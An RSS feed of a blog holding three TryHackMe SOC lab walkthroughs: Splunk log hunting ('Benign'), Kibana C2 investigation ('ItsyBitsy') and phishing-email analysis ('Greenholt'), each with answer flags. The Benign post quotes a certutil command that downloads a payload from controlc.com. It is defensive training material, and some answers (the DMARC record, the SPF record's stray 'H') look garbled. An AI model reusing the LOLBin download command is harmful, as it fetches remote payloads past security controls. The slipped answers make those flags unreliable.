<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>TryHackMe on Roduygo | Blog</title><link>/tags/tryhackme/</link><description>Recent content in TryHackMe on Roduygo | Blog</description><generator>Hugo -- gohugo.io</generator><language>en</language><lastBuildDate>Sun, 23 Aug 2026 23:40:00 +0700</lastBuildDate><atom:link href="/tags/tryhackme/index.xml" rel="self" type="application/rss+xml"/><item><title>Benign - TryHackMe Walkthrough</title><link>/post/benign/</link><pubDate>Sun, 23 Aug 2026 23:40:00 +0700</pubDate><guid>/post/benign/</guid><description>&lt;p&gt;One of the client’s IDS indicated a potentially suspicious process execution indicating one of the hosts from the HR department was compromised. Some tools related to network information gathering / scheduled tasks were executed which confirmed the suspicion. Due to limited resources, we could only pull the process execution logs with Event ID: 4688 and ingested them into Splunk with the index &lt;code&gt;win_eventlogs&lt;/code&gt; for further investigation.&lt;/p&gt;
&lt;h2 id="network-information"&gt;Network Information
&lt;/h2&gt;&lt;p&gt;The network is divided into three logical segments. It will help in the investigation.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;IT Department:&lt;/strong&gt; James, Moin, Katrina&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;HR department:&lt;/strong&gt; Haroon, Chris, Diana&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Marketing department:&lt;/strong&gt; Bell, Amelia, Deepak&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="task-1-connect-and-setup-lab"&gt;Task 1: Connect and Setup Lab
&lt;/h2&gt;&lt;p&gt;&lt;em&gt;(No questions for this task)&lt;/em&gt;&lt;/p&gt;
&lt;h2 id="task-2-investigation-questions"&gt;Task 2: Investigation Questions
&lt;/h2&gt;&lt;h3 id="1-how-many-logs-are-ingested-from-the-month-of-march-2022"&gt;1. How many logs are ingested from the month of March, 2022?
&lt;/h3&gt;&lt;p&gt;Easy to find, set date from &lt;code&gt;01/03/2022&lt;/code&gt; up to now.&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; 13959&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="2-imposter-alert-there-seems-to-be-an-imposter-account-observed-in-the-logs-what-is-the-name-of-that-user"&gt;2. Imposter Alert: There seems to be an imposter account observed in the logs, what is the name of that user?
&lt;/h3&gt;&lt;p&gt;When addressing this question, I briefly checked the list of usernames and tried a few, but without success; we need to filter out all the usernames present in this log to be able to detect them.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-splunk" data-lang="splunk"&gt;index=&amp;#34;win_eventlogs&amp;#34; | stats count by UserName
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;img class="gallery-image" data-flex-basis="268px" data-flex-grow="112" height="572" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/benign/image.png" width="641"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; Amel1a&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="3-which-user-from-the-hr-department-was-observed-to-be-running-scheduled-tasks"&gt;3. Which user from the HR department was observed to be running scheduled tasks?
&lt;/h3&gt;&lt;p&gt;When filtering events related to the schedule, I identified four users; however, one user had only a single event. This appears quite unusual, given that schedules are typically used frequently, whereas malware often requires only a single instance of persistence.
&lt;img class="gallery-image" data-flex-basis="1170px" data-flex-grow="487" height="124" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/benign/image2.png" width="605"&gt;&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-splunk" data-lang="splunk"&gt;index=&amp;#34;win_eventlogs&amp;#34; schtasks UserName=&amp;#34;Chris.fort&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;When examining this user&amp;rsquo;s logs, it appears there was an attempt to keep the &lt;code&gt;update.exe&lt;/code&gt; application running—and fortunately, that name turned out to be the flag.&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; Chris.fort&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="4-which-user-from-the-hr-department-executed-a-system-process-lolbin-to-download-a-payload-from-a-file-sharing-host"&gt;4. Which user from the HR department executed a system process (LOLBIN) to download a payload from a file-sharing host.
&lt;/h3&gt;&lt;p&gt;First, we will attempt to search for outputs related to the HR department&amp;rsquo;s hostname, then, we can examine the commands that were executed specifically focusing on one-time commands, as the problem statement implies the malware typically requires only a single download.&lt;/p&gt;
&lt;p&gt;&lt;img class="gallery-image" data-flex-basis="297px" data-flex-grow="124" height="485" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/benign/image3.png" width="602"&gt;&lt;/p&gt;
&lt;p&gt;When I looked through these commands, I was quite surprised to find one that seemed very suspicious: a &lt;code&gt;certutil&lt;/code&gt; command to the control domain with the &lt;code&gt;-f&lt;/code&gt; parameter.
&lt;img class="gallery-image" data-flex-basis="562px" data-flex-grow="234" height="386" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/benign/image4.png" srcset="/post/benign/image4_hu_3283ce9e547af78d.png 800w, /post/benign/image4.png 905w" width="905"&gt;&lt;/p&gt;
&lt;p&gt;Now we just need to investigate exactly who carried it out.
&lt;img class="gallery-image" data-flex-basis="395px" data-flex-grow="164" height="576" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/benign/image5.png" srcset="/post/benign/image5_hu_73eb4cc7a4ee7f1d.png 800w, /post/benign/image5.png 949w" width="949"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; haroon&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="5-to-bypass-the-security-controls-which-system-process-lolbin-was-used-to-download-a-payload-from-the-internet"&gt;5. To bypass the security controls, which system process (lolbin) was used to download a payload from the internet?
&lt;/h3&gt;&lt;p&gt;We will delve into an analysis of the command in the sentence above to find out:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-cmd" data-lang="cmd"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;certutil.exe -urlcache -f - https://controlc.com/e4d11035 benign.exe 
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;certutil.exe&lt;/code&gt; is a legitimate, built-in Windows tool primarily responsible for managing, verifying, and configuring security certificates.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;-urlcache&lt;/code&gt;: Connects to a specified URL.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;-split&lt;/code&gt;: Extracts the retrieved data and forces the system to save it as a separate physical file on the hard drive. &lt;em&gt;(Note: The flag &lt;code&gt;-split&lt;/code&gt; wasn&amp;rsquo;t in the command above but is commonly used with certutil)&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; certutil.exe&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="6-what-was-the-date-that-this-binary-was-executed-by-the-infected-host-format-yyyy-mm-dd"&gt;6. What was the date that this binary was executed by the infected host? format (YYYY-MM-DD)
&lt;/h3&gt;&lt;p&gt;For the following questions, the answers are quite easy to find in the log above.&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; 2022-03-04&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="7-which-third-party-site-was-accessed-to-download-the-malicious-payload"&gt;7. Which third-party site was accessed to download the malicious payload?
&lt;/h3&gt;
 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; controlc.com&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="8-what-is-the-name-of-the-file-that-was-saved-on-the-host-machine-from-the-c2-server-during-the-post-exploitation-phase"&gt;8. What is the name of the file that was saved on the host machine from the C2 server during the post-exploitation phase?
&lt;/h3&gt;
 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; benign.exe&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="9-the-suspicious-file-downloaded-from-the-c2-server-contained-malicious-content-with-the-pattern-thm-what-is-that-pattern"&gt;9. The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{&amp;hellip;&amp;hellip;&amp;hellip;.}; what is that pattern?
&lt;/h3&gt;
 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; THM{KJ&amp;amp;*H^B0}&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="10-what-is-the-url-that-the-infected-host-connected-to"&gt;10. What is the URL that the infected host connected to?
&lt;/h3&gt;
 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; &lt;a class="link" href="https://controlc.com/e4d11035" target="_blank" rel="noopener"
 &gt;https://controlc.com/e4d11035&lt;/a&gt;&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;Thank you for reading my blog, see you later!&lt;/em&gt;&lt;/p&gt;</description></item><item><title>ItsyBitsy - TryHackMe Challenges</title><link>/post/itsybitsy/</link><pubDate>Wed, 19 Aug 2026 16:30:00 +0700</pubDate><guid>/post/itsybitsy/</guid><description>&lt;p&gt;Hello everyone, to continue our journey toward TryHackMe SOC Level 1 certification, today we will be tackling the ItsyBitsy room.&lt;/p&gt;
&lt;p&gt;During normal SOC monitoring, Analyst John observed an alert on an IDS solution indicating a potential C2 communication from a user Browne from the HR department. A suspicious file was accessed containing a malicious pattern &lt;code&gt;THM:{ ________ }&lt;/code&gt;. A week-long HTTP connection logs have been pulled to investigate. Due to limited resources, only the connection logs could be pulled out and are ingested into the &lt;code&gt;connection_logs&lt;/code&gt; index in Kibana.&lt;/p&gt;
&lt;p&gt;Our task in this room will be to examine the network connection logs of this user, find the link and the content of the file, and answer the questions.&lt;/p&gt;
&lt;h2 id="task-1-setup-and-connect-lab"&gt;Task 1: Setup and Connect Lab
&lt;/h2&gt;&lt;p&gt;&lt;em&gt;(No questions for this task)&lt;/em&gt;&lt;/p&gt;
&lt;h2 id="task-2-scenario---investigate-a-potential-c2-communication-alert"&gt;Task 2: Scenario - Investigate a potential C2 communication alert
&lt;/h2&gt;&lt;h3 id="1-how-many-events-were-returned-for-the-month-of-march-2022"&gt;1. How many events were returned for the month of March 2022?
&lt;/h3&gt;&lt;p&gt;Open Discover and set date.
&lt;img alt="img1" class="gallery-image" data-flex-basis="1680px" data-flex-grow="700" height="86" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/itsybitsy/image.png" width="602"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; 1428&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="2-what-is-the-ip-associated-with-the-suspected-user-in-the-logs"&gt;2. What is the IP associated with the suspected user in the logs?
&lt;/h3&gt;&lt;p&gt;For this question, I examined the source IP addresses across the entire filtered log and found only two addresses, the correct answer is one of those two.
&lt;img alt="img" class="gallery-image" data-flex-basis="499px" data-flex-grow="208" height="259" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/itsybitsy/img2.png" width="539"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; 192.166.65.54&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="3-the-users-machine-used-a-legit-windows-binary-to-download-a-file-from-the-c2-server-what-is-the-name-of-the-binary"&gt;3. The user&amp;rsquo;s machine used a legit windows binary to download a file from the C2 server. What is the name of the binary?
&lt;/h3&gt;&lt;p&gt;Leveraging the results from the previous IP address, we apply a &lt;code&gt;GET&lt;/code&gt; method filter to identify the downloaded item, easily obtaining a log like the following:
&lt;img alt="img" class="gallery-image" data-flex-basis="383px" data-flex-grow="159" height="377" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/itsybitsy/img3.png" width="602"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; bitsadmin&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="4-the-infected-machine-connected-with-a-famous-filesharing-site-in-this-period-which-also-acts-as-a-c2-server-used-by-the-malware-authors-to-communicate-what-is-the-name-of-the-filesharing-site"&gt;4. The infected machine connected with a famous filesharing site in this period, which also acts as a C2 server used by the malware authors to communicate. What is the name of the filesharing site?
&lt;/h3&gt;&lt;p&gt;The server mentioned here is the very location from which the C2 malware is downloaded, we can clearly see this in the log.
&lt;img alt="img" class="gallery-image" data-flex-basis="441px" data-flex-grow="184" height="294" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/itsybitsy/img4.png" width="541"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; pastebin.com&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="5-what-is-the-full-url-of-the-c2-to-which-the-infected-host-is-connected"&gt;5. What is the full URL of the C2 to which the infected host is connected?
&lt;/h3&gt;&lt;p&gt;Upon investigating the traffic flows from the infected server, we observed that after the malware was downloaded, a separate log entry showed the execution of an HTTP &lt;code&gt;HEAD&lt;/code&gt; method; a closer examination of that log revealed communication with the specific target address.
&lt;img alt="img" class="gallery-image" data-flex-basis="1058px" data-flex-grow="440" height="137" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/itsybitsy/img5.png" width="604"&gt;
&lt;img alt="img" class="gallery-image" data-flex-basis="976px" data-flex-grow="406" height="135" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/itsybitsy/img6.png" width="549"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; pastebin.com/yTg0Ah6a&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="6-a-file-was-accessed-on-the-filesharing-site-what-is-the-name-of-the-file-accessed"&gt;6. A file was accessed on the filesharing site. What is the name of the file accessed?
&lt;/h3&gt;&lt;p&gt;Paste the link you just found into your browser and see what it is.
&lt;img alt="img" class="gallery-image" data-flex-basis="1043px" data-flex-grow="434" height="135" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/itsybitsy/img7.png" width="587"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; secret.txt&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="7-what-is-the-flag"&gt;7. What is the flag?
&lt;/h3&gt;
 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; THM{SECRET__CODE}&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;Thank you for reading my blog, see you later!&lt;/em&gt;&lt;/p&gt;</description></item><item><title>The Greenholt Phish</title><link>/post/the-greenholt-phishing/</link><pubDate>Sat, 15 Aug 2026 12:00:00 +0700</pubDate><guid>/post/the-greenholt-phishing/</guid><description>&lt;p&gt;For this scenario, it seems like we are going to investigate an email received from one of our sales executive. The executive wasn’t expecting an email from this customer, along with money being transferred to his account and an attachment that was not requested.&lt;/p&gt;
&lt;h2 id="task-1what-is-the-transfer-reference-number-listed-in-the-emails-subject-line"&gt;Task 1:What is the Transfer Reference Number listed in the email&amp;rsquo;s Subject line?
&lt;/h2&gt;&lt;p&gt;As soon as we open the challenge file in Thunderbird mai, the answer is right there before our eyes; the visible headers alone allow us to answer many of the questions below&lt;/p&gt;
&lt;p&gt;&lt;img alt="Thunderbird Mail " class="gallery-image" data-flex-basis="274px" data-flex-grow="114" height="523" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/the-greenholt-phishing/image.png" width="598"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; 09674321&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h2 id="task-2-what-is-the-display-name-of-the-sender"&gt;Task 2: What is the display name of the sender?
&lt;/h2&gt;
 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; Mr.James Jackson&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;p&gt;Continue investigating the email headers.&lt;/p&gt;
&lt;h2 id="task-3-what-is-the-senders-email-address"&gt;Task 3: What is the sender&amp;rsquo;s email address?
&lt;/h2&gt;
 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; &lt;a class="link" href="mailto:info@mutawamarine.com" &gt;info@mutawamarine.com&lt;/a&gt;&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h2 id="task-4-what-email-address-will-receive-a-reply-to-this-email"&gt;Task 4: What email address will receive a reply to this email?
&lt;/h2&gt;
 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; &lt;a class="link" href="mailto:info.mutawamarine@mail.com" &gt;info.mutawamarine@mail.com&lt;/a&gt;
Begin analyzing the message source.&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h2 id="task-5-what-is-the-originating-ip-address-of-this-email"&gt;Task 5: What is the originating IP address of this email?
&lt;/h2&gt;&lt;p&gt;Open source this mail with Ctrl +U , we can find this ip at received address
&lt;img alt="Ctrl + U to view src mail" class="gallery-image" data-flex-basis="1114px" data-flex-grow="464" height="129" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/the-greenholt-phishing/img2.png" width="599"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; 192.119.71.157&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h2 id="task-6-who-is-the-owner-of-the-originating-ip"&gt;Task 6: Who is the owner of the originating IP?
&lt;/h2&gt;&lt;p&gt;Search this ip with IP WHOIS Lookup
&lt;img alt="WHOIS Lookup search" class="gallery-image" data-flex-basis="839px" data-flex-grow="349" height="167" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/the-greenholt-phishing/omg3.png" width="584"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; HostPapa
Run an SPF record check on the Return-Path domain identified in the email headers.&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h2 id="task-7-what-is-the-full-spf-record-for-this-domain"&gt;Task 7: What is the full SPF record for this domain?
&lt;/h2&gt;&lt;p&gt;Copy this domain and paste to SPF Surveyor: mutawamarine.com&lt;/p&gt;
&lt;p&gt;&lt;img alt="Find this domain" class="gallery-image" data-flex-basis="1248px" data-flex-grow="520" height="113" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/the-greenholt-phishing/img4.png" width="588"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="SPF Surveyor" class="gallery-image" data-flex-basis="363px" data-flex-grow="151" height="390" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/the-greenholt-phishing/img5.png" width="591"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; Hv=spf1 include:spf.protection.outlook.com -all&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h2 id="task-8-what-is-the-complete-dmarc-record-for-this-domain"&gt;Task 8: What is the complete DMARC record for this domain?
&lt;/h2&gt;&lt;p&gt;Check this domain with (&lt;a class="link" href="https://ondmarc.redsift.com/spf-surveyor%29" target="_blank" rel="noopener"
 &gt;https://ondmarc.redsift.com/spf-surveyor)&lt;/a&gt;.
&lt;img alt="DMARC" class="gallery-image" data-flex-basis="848px" data-flex-grow="353" height="161" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/the-greenholt-phishing/img6.png" width="569"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; v=spf1 include:spf.protection.outlook.com -all&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h2 id="task-9-what-is-the-file-name-of-the-attachment-found-in-the-email"&gt;Task 9: What is the file name of the attachment found in the email?
&lt;/h2&gt;&lt;p&gt;Search thì key attachment to find file name
&lt;img alt="—" class="gallery-image" data-flex-basis="697px" data-flex-grow="290" height="207" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/the-greenholt-phishing/img7.png" width="602"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; SWT_#09674321____PDF__.CAB&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h2 id="task-10-what-is-the-sha256-hash-of-the-file-attachment"&gt;Task 10: What is the SHA256 hash of the file attachment?
&lt;/h2&gt;&lt;p&gt;Run sha256sum SWT_#09674321____PDF__.CAB to find flag&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sha256sum SWT_#09674321____PDF__.CAB
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="—" class="gallery-image" data-flex-basis="3030px" data-flex-grow="1262" height="48" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/the-greenholt-phishing/img8.png" width="606"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; 2e91c533615a9bb8929ac4bb76707b2444597ce063d84a4b33525e25074fff3f&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h2 id="task-11-what-is-the-attachments-file-size-dont-forget-to-add-kb-to-your-answer-num-kb"&gt;Task 11: What is the attachments file size? (Don’t forget to add “KB” to your answer, NUM KB)
&lt;/h2&gt;&lt;p&gt;I copied the hash value and looked it up at virustotal and found the size.
Press enter or click to view image in full size
&lt;img alt="Virustotal" class="gallery-image" data-flex-basis="1668px" data-flex-grow="695" height="85" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/the-greenholt-phishing/img9.png" width="591"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; 400.26 KB&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h2 id="task-12-what-is-the-actual-file-extension-of-the-attachment"&gt;Task 12: What is the actual file extension of the attachment?
&lt;/h2&gt;&lt;p&gt;Heading over to the details tab, I saw that the file type is RAR.
Press enter or click to view image in full size
&lt;img alt="Virustotal" class="gallery-image" data-flex-basis="547px" data-flex-grow="228" height="276" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/the-greenholt-phishing/img10.png" width="630"&gt;&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Flag:&lt;/strong&gt; RAR&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;Thank you for read my blog, see you latter&lt;/em&gt;&lt;/p&gt;</description></item></channel></rss>